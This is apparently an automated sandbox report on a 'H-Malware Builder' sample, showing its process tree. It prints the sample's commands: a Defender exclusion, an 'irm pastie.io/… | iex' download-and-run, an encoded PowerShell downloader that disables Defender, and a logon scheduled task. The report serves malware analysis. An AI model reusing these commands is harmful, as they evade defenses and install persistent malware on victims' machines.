PID 4728 wrote to memory of 1248	4728	dllhost.exe	21
PID 4728 wrote to memory of 1296	4728	dllhost.exe	22
PID 4728 wrote to memory of 1396	4728	dllhost.exe	23
PID 4728 wrote to memory of 1432	4728	dllhost.exe	24
PID 4728 wrote to memory of 1500	4728	dllhost.exe	25
PID 4728 wrote to memory of 1512	4728	dllhost.exe	26
PID 4728 wrote to memory of 1532	4728	dllhost.exe	27
PID 4728 wrote to memory of 1688	4728	dllhost.exe	28
PID 4728 wrote to memory of 1736	4728	dllhost.exe	29
PID 4728 wrote to memory of 1764	4728	dllhost.exe	30
PID 4728 wrote to memory of 1848	4728	dllhost.exe	31
PID 4728 wrote to memory of 1872	4728	dllhost.exe	32
PID 4728 wrote to memory of 2040	4728	dllhost.exe	33
PID 4728 wrote to memory of 1228	4728	dllhost.exe	34
PID 4728 wrote to memory of 2060	4728	dllhost.exe	35
PID 4728 wrote to memory of 2068	4728	dllhost.exe	36
PID 4728 wrote to memory of 2148	4728	dllhost.exe	37
PID 4728 wrote to memory of 2268	4728	dllhost.exe	39
PID 4728 wrote to memory of 2372	4728	dllhost.exe	40
PID 4728 wrote to memory of 2380	4728	dllhost.exe	41
PID 4728 wrote to memory of 2396	4728	dllhost.exe	42
PID 4728 wrote to memory of 2484	4728	dllhost.exe	43
PID 4728 wrote to memory of 2504	4728	dllhost.exe	44
PID 4728 wrote to memory of 2520	4728	dllhost.exe	45
PID 4728 wrote to memory of 2552	4728	dllhost.exe	46
PID 4728 wrote to memory of 2560	4728	dllhost.exe	47
PID 4728 wrote to memory of 2592	4728	dllhost.exe	48
PID 4728 wrote to memory of 432	4728	dllhost.exe	49
PID 4728 wrote to memory of 424	4728	dllhost.exe	50
PID 4728 wrote to memory of 2228	4728	dllhost.exe	51
PID 4728 wrote to memory of 3348	4728	dllhost.exe	52
PID 4728 wrote to memory of 3468	4728	dllhost.exe	53
PID 4728 wrote to memory of 3524	4728	dllhost.exe	54
PID 4728 wrote to memory of 3888	4728	dllhost.exe	57
PID 4728 wrote to memory of 3944	4728	dllhost.exe	58
PID 4728 wrote to memory of 4016	4728	dllhost.exe	59
PID 4728 wrote to memory of 4056	4728	dllhost.exe	60

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:632
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  PID:468
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{fa09d281-1104-4730-9ec7-afc5e07286ae}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4728

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:692

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:988

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:540

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:772

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1052

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1132

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
- Drops file in System32 directory
PID:1140

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1152

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm
1⤵
PID:1248

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1296

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
- Indicator Removal: Clear Windows Event Logs
PID:1396

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1432

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1500

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1512

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1532
- C:\Windows\system32\sihost.exe
  sihost.exe
  2⤵
  PID:432

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1688

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1736

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
1⤵
PID:1764

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1848

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1872

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:2040

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1228

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:2060

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:2068

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2148

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2268

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2372

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2380

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
1⤵
- Modifies data under HKEY_USERS
PID:2396

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2484

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2504

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2520

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2552

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
PID:2560

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2592

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:424

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:2228

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:3348
- C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
  "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
  2⤵
  - Drops startup file
  - Suspicious use of WriteProcessMemory
  PID:2500
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1192
- - C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
    "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
    3⤵
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4816
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
      4⤵
      PID:1216
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:1476
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "irm pastie.io/raw/fgaazw | iex"
        5⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3460
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e JABzAGUAdAB0AGkAbgBnAHMAIAA9ACAAJwB7ACIAVwBEACIAOgAgAGYAYQBsAHMAZQAsACAAIgBhAGQAbQBpAG4AcgB1AG4AIgA6ACAAZgBhAGwAcwBlAH0AJwAgAHwAIABDAG8AbgB2AGUAcgB0AEYAcgBvAG0ALQBKAHMAbwBuADsAJAByAGEAbgBkAG8AbQBTAHQAcgBpAG4AZwAgAD0AIAAiAGEAbQBkAHIAMQBpAHkAbAB0AFQAIgA7AGkAZgAgACgAJABzAGUAdAB0AGkAbgBnAHMALgBXAEQAKQAgAHsAJABzAGUAdAB0AGkAbgBnAHMALgBhAGQAbQBpAG4AcgB1AG4AIAA9ACAAJAB0AHIAdQBlADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAHIAYQB3AC4AZwBpAHQAaAB1AGIAdQBzAGUAcgBjAG8AbgB0AGUAbgB0AC4AYwBvAG0ALwBuAGkAbgBoAHAAbgAxADMAMwA3AC8ARABpAHMAYQBiAGwAZQAtAFcAaQBuAGQAbwB3AHMALQBEAGUAZgBlAG4AZABlAHIALwBtAGEAaQBuAC8AcwBvAHUAcgBjAGUALgBiAGEAdAAnACwAIAAkAGUAbgB2ADoAVABFAE0AUAAgACsAIAAnAFwAJwAgACsAIAAkAHIAYQBuAGQAbwBtAFMAdAByAGkAbgBnACAAKwAgACcALgBiAGEAdAAnACkAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABFAE0AUAAgACsAIAAnAFwAJwAgACsAIAAkAHIAYQBuAGQAbwBtAFMAdAByAGkAbgBnACAAKwAgACcALgBiAGEAdAAnACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAgAC0AVwBhAGkAdAAgAC0AVgBlAHIAYgAgAFIAdQBuAEEAcwA7AH0AOwBpAGYAIAAoACQAcwBlAHQAdABpAG4AZwBzAC4AYQBkAG0AaQBuAHIAdQBuACkAIAB7ACQAdQByAGwAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AZwBpAHQAaAB1AGIALgBjAG8AbQAvAE0AYQBsAHcAYQByAGUAVABlAGEAbQAvAFMAZQBjAHUAcgBpAHQAeQBIAGUAYQBsAHQAaABTAGUAcgB2AGkAYwBlAC8AcgBhAHcALwBtAGEAaQBuAC8AUwBlAGMAdQByAGkAdAB5AEgAZQBhAGwAdABoAFMAZQByAHYAaQBjAGUALgBlAHgAZQAnADsAJABvAHUAdABwAHUAdABQAGEAdABoACAAPQAgACQAZQBuAHYAOgBUAEUATQBQACAAKwAgACcAXAAnACAAKwAgACcAUwBlAGMAdQByAGkAdAB5AEgAZQBhAGwAdABoAFMAZQByAHYAaQBjAGUALgBlAHgAZQAnADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAdQByAGwALAAgACQAbwB1AHQAcAB1AHQAUABhAHQAaAApADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACQAbwB1AHQAcAB1AHQAUABhAHQAaAAgAC0AVgBlAHIAYgAgAFIAdQBuAEEAcwA7AH0AZQBsAHMAZQAgAHsAJAB1AHIAbAAgAD0AIAAnAGgAdAB0AHAAcwA6AC8ALwBnAGkAdABoAHUAYgAuAGMAbwBtAC8ATQBhAGwAdwBhAHIAZQBUAGUAYQBtAC8AUwBlAGMAdQByAGkAdAB5AEgAZQBhAGwAdABoAFMAZQByAHYAaQBjAGUALwByAGEAdwAvAG0AYQBpAG4ALwBTAGUAYwB1AHIAaQB0AHkASABlAGEAbAB0AGgAUwBlAHIAdgBpAGMAZQAuAGUAeABlACcAOwAkAG8AdQB0AHAAdQB0AFAAYQB0AGgAIAA9ACAAJABlAG4AdgA6AFQARQBNAFAAIAArACAAJwBcACcAIAArACAAJwBTAGUAYwB1AHIAaQB0AHkASABlAGEAbAB0AGgAUwBlAHIAdgBpAGMAZQAuAGUAeABlACcAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJAB1AHIAbAAsACAAJABvAHUAdABwAHUAdABQAGEAdABoACkAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAJABvAHUAdABwAHUAdABQAGEAdABoADsAfQA=
        6⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5052
  - - C:\Windows\SYSTEM32\SCHTASKS.exe
      "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:428
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:2820
  - - C:\Windows\SYSTEM32\SCHTASKS.exe
      "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:732
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:1908
- - C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
    "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
    3⤵
    - Drops startup file
    PID:2776
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:4872
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        Suspicious use of SetWindowsHookEx
        
        PID:2668
    - - C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 4872 -s 160
        5⤵
        Checks processor information in registry
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        
        PID:4980
  - - C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
      "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
      4⤵
      Drops startup file
      PID:1544
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:3432
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:3272
    - - C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        5⤵
        Drops startup file
        
        PID:5080
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:1492
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        Suspicious use of SetWindowsHookEx
        
        PID:3372
      - C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        6⤵
        Drops startup file
        
        PID:1888
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:640
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:1064
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        7⤵
        Drops startup file
        
        PID:4156
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:1192
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        9⤵
        
        PID:916
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        8⤵
        Drops startup file
        
        PID:1656
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        9⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:1932
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        10⤵
        
        PID:2764
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        9⤵
        Drops startup file
        
        PID:856
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        10⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:5032
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        11⤵
        
        PID:1404
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        10⤵
        Drops startup file
        
        PID:2896
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        11⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:2012
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        12⤵
        
        PID:3200
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        11⤵
        Drops startup file
        
        PID:2368
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        12⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:1212
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        13⤵
        
        PID:4896
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        12⤵
        Drops startup file
        
        PID:1888
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        13⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:244
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        14⤵
        Suspicious use of SetWindowsHookEx
        
        PID:796
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        13⤵
        Drops startup file
        
        PID:4156
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        14⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:5092
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        15⤵
        
        PID:2248
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        14⤵
        Drops startup file
        
        PID:2496
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        15⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:2752
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        16⤵
        Suspicious use of SetWindowsHookEx
        
        PID:4708
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        15⤵
        Drops startup file
        
        PID:3100
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        16⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:3372
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        17⤵
        
        PID:1492
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        16⤵
        Drops startup file
        
        PID:4152
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        17⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3308
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        18⤵
        Suspicious use of SetWindowsHookEx
        
        PID:4416
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        17⤵
        Drops startup file
        
        PID:3292
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        18⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:916
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        19⤵
        Suspicious use of SetWindowsHookEx
        
        PID:4852
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        18⤵
        Drops startup file
        
        PID:1112
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        19⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3840
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        20⤵
        
        PID:2092
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        19⤵
        Drops startup file
        
        PID:4156
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        20⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4112
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        21⤵
        
        PID:1812
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        20⤵
        Drops startup file
        
        PID:4836
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        21⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2420
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        22⤵
        Suspicious use of SetWindowsHookEx
        
        PID:4948
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        21⤵
        Drops startup file
        
        PID:1332
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
